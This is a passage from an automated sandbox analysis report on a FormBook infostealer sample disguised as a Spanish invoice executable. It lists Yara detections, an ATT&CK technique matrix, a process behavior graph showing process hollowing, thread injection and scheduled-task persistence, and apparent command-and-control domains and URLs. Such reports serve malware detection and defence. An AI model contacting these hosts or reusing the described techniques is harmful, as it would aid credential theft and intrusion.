            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\marlett.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Factura de proforma.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

            Stealing of Sensitive Information:

            barindex
            Yara detected FormBookShow sources
            Source: Yara matchFile source: 6.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.Factura de proforma.exe.3cc0560.3.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 6.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.Factura de proforma.exe.3d0ff80.2.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000006.00000002.402637395.0000000001500000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000000.357102552.0000000010B69000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.322614171.0000000003B89000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000A.00000002.570999919.0000000000540000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.401884612.0000000000400000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.402727602.0000000001530000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000A.00000002.571846259.0000000002990000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000A.00000002.571574263.00000000025D0000.00000040.00020000.sdmp, type: MEMORY

            Remote Access Functionality:

            barindex
            Yara detected FormBookShow sources
            Source: Yara matchFile source: 6.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.Factura de proforma.exe.3cc0560.3.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 6.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.Factura de proforma.exe.3d0ff80.2.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000006.00000002.402637395.0000000001500000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000000.357102552.0000000010B69000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.322614171.0000000003B89000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000A.00000002.570999919.0000000000540000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.401884612.0000000000400000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.402727602.0000000001530000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000A.00000002.571846259.0000000002990000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000A.00000002.571574263.00000000025D0000.00000040.00020000.sdmp, type: MEMORY

            Mitre Att&ck Matrix

            Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
            Valid AccountsScheduled Task/Job1Scheduled Task/Job1Process Injection512Rootkit1Credential API Hooking1Security Software Discovery221Remote ServicesCredential API Hooking1Exfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
            Default AccountsShared Modules1Boot or Logon Initialization ScriptsScheduled Task/Job1Masquerading1LSASS MemoryProcess Discovery2Remote Desktop ProtocolArchive Collected Data1Exfiltration Over BluetoothIngress Tool Transfer1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
            Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Disable or Modify Tools1Security Account ManagerVirtualization/Sandbox Evasion31SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Application Layer Protocol2Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
            Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Virtualization/Sandbox Evasion31NTDSRemote System Discovery1Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol12SIM Card SwapCarrier Billing Fraud
            Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptProcess Injection512LSA SecretsFile and Directory Discovery1SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
            Replication Through Removable MediaLaunchdRc.commonRc.commonDeobfuscate/Decode Files or Information1Cached Domain CredentialsSystem Information Discovery112VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
            External Remote ServicesScheduled TaskStartup ItemsStartup ItemsObfuscated Files or Information4DCSyncNetwork SniffingWindows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
            Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobSoftware Packing13Proc FilesystemNetwork Service ScanningShared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue

            Behavior Graph

            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 502357 Sample: Factura de proforma.exe Startdate: 13/10/2021 Architecture: WINDOWS Score: 100 36 www.new-post-vehicle-site.xyz 2->36 38 www.festival-du-chanvre.com 2->38 46 Found malware configuration 2->46 48 Malicious sample detected (through community Yara rule) 2->48 50 Yara detected AntiVM3 2->50 52 8 other signatures 2->52 11 Factura de proforma.exe 10 2->11         started        signatures3 process4 file5 32 C:\Users\user\AppData\Local\...\tmpD689.tmp, XML 11->32 dropped 34 C:\Users\user\AppData\...\tskpCbAwtxoaw.exe, PE32 11->34 dropped 14 RegSvcs.exe 11->14         started        17 schtasks.exe 1 11->17         started        process6 signatures7 62 Modifies the context of a thread in another process (thread injection) 14->62 64 Maps a DLL or memory area into another process 14->64 66 Sample uses process hollowing technique 14->66 68 2 other signatures 14->68 19 explorer.exe 14->19 injected 23 conhost.exe 17->23         started        process8 dnsIp9 40 parking3.dnstool.net 13.209.99.177, 49806, 80 AMAZON-02US United States 19->40 42 www.palmonlae.space 19->42 44 www.aminobalm.com 19->44 54 System process connects to network (likely due to code injection or exploit) 19->54 25 cscript.exe 19->25         started        signatures10 process11 signatures12 56 Modifies the context of a thread in another process (thread injection) 25->56 58 Maps a DLL or memory area into another process 25->58 60 Tries to detect virtualization through RDTSC time measurements 25->60 28 cmd.exe 1 25->28         started        process13 process14 30 conhost.exe 28->30         started       

            Screenshots

            Thumbnails

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.

            windows-stand

            Antivirus, Machine Learning and Genetic Malware Detection

            Initial Sample

            No Antivirus matches

            Dropped Files

            No Antivirus matches

            Unpacked PE Files

            SourceDetectionScannerLabelLinkDownload
            6.2.RegSvcs.exe.400000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File

            Domains

            No Antivirus matches

            URLs

            SourceDetectionScannerLabelLink
            http://www.jiyu-kobo.co.jp/XDiUa0%Avira URL Cloudsafe
            http://www.fonts.comc0%URL Reputationsafe
            http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
            http://www.founder.com.cn/cn2U%0%Avira URL Cloudsafe
            http://www.founder.com.cn/cn.U0%Avira URL Cloudsafe
            http://www.jiyu-kobo.co.jp/tDMU0%Avira URL Cloudsafe
            http://www.aminobalm.com/cb3b/?c6=kr386M7znJup/B2j4KhdpwCgkxfUSLFq19BV4h8BDsMel0JC//DVwypubzBUvp11Q9BD&A0DXb=eZk4rh9h0%Avira URL Cloudsafe
            http://www.sandoll.co.krN.TTFs0%Avira URL Cloudsafe
            http://www.tiro.com0%URL Reputationsafe
            http://www.tiro.comF0%URL Reputationsafe
            http://www.goodfont.co.kr0%URL Reputationsafe
            http://www.jiyu-kobo.co.jp/a-eoDFU$0%Avira URL Cloudsafe
            http://www.jiyu-kobo.co.jp/jp/0%URL Reputationsafe
            http://www.fonts.com-uT0%Avira URL Cloudsafe
            http://en.w0%URL Reputationsafe
            http://www.collada.org/2005/11/COLLADASchema9Done0%URL Reputationsafe
            http://www.jiyu-kobo.co.jp/ko0%Avira URL Cloudsafe
            http://www.carterandcone.coml0%URL Reputationsafe
            http://www.sajatypeworks.com0%URL Reputationsafe
            http://www.typography.netD0%URL Reputationsafe
            http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
            http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
            http://fontfabrik.com0%URL Reputationsafe
            http://www.founder.com.cn/cn0%URL Reputationsafe
            http://www.jiyu-kobo.co.jp/t0%URL Reputationsafe
            http://www.jiyu-kobo.co.jp/7D0%Avira URL Cloudsafe
            http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
            http://www.fonts.comn0%URL Reputationsafe
            http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
            www.thefanlounge.com/cb3b/0%Avira URL Cloudsafe
            http://www.sandoll.co.kr0%URL Reputationsafe
            http://www.urwpp.deDPlease0%URL Reputationsafe
            http://www.jiyu-kobo.co.jp/JD0%Avira URL Cloudsafe
            http://www.zhongyicts.com.cn0%URL Reputationsafe
            http://www.sakkal.com0%URL Reputationsafe
            https://www.dotname.co.kr/customer/event/2019/20190604_landing_dotname?c6=kr386M7znJup/B2j4KhdpwCgkx0%Avira URL Cloudsafe

            Domains and IPs

            Contacted Domains

            NameIPActiveMaliciousAntivirus DetectionReputation
            parking3.dnstool.net
            		13.209.99.177
            		truetrue
              		unknown
              www.festival-du-chanvre.com
              		unknown
              		unknowntrue
                		unknown
                www.aminobalm.com
                		unknown
                		unknowntrue
                  		unknown
                  www.palmonlae.space
                  		unknown
                  		unknowntrue
                    		unknown
                    www.new-post-vehicle-site.xyz
                    		unknown
                    		unknowntrue
                      		unknown

                      Contacted URLs

                      NameMaliciousAntivirus DetectionReputation
                      http://www.aminobalm.com/cb3b/?c6=kr386M7znJup/B2j4KhdpwCgkxfUSLFq19BV4h8BDsMel0JC//DVwypubzBUvp11Q9BD&A0DXb=eZk4rh9htrue
                      • Avira URL Cloud: safe
                      		unknown
                      www.thefanlounge.com/cb3b/true
                      • Avira URL Cloud: safe
                      		low

                      URLs from Memory and Binaries

                      NameSourceMaliciousAntivirus DetectionReputation
                      http://www.apache.org/licenses/LICENSE-2.0Factura de proforma.exe, 00000000.00000002.323967791.0000000006CE2000.00000004.00000001.sdmpfalse
                        		high
                        http://www.fontbureau.comFactura de proforma.exe, 00000000.00000002.323967791.0000000006CE2000.00000004.00000001.sdmpfalse
